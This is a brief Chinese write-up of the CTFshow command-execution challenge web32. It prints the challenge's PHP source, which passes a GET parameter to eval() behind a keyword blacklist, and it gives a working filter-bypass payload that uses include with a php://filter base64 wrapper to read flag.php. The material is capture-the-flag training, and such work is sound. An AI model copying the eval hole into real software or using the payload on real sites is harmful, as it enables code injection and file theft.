CTFshow 命令执行 web32

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这次发现;被过滤了 参考大佬的相关文章 用 include(不加括号)绕过
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
base64解码后拿到flag

上一篇:使用js压缩图片后转为二进制上传


下一篇:Apache Ofbiz xmlrpc RCE漏洞(CVE-2020-9496)复现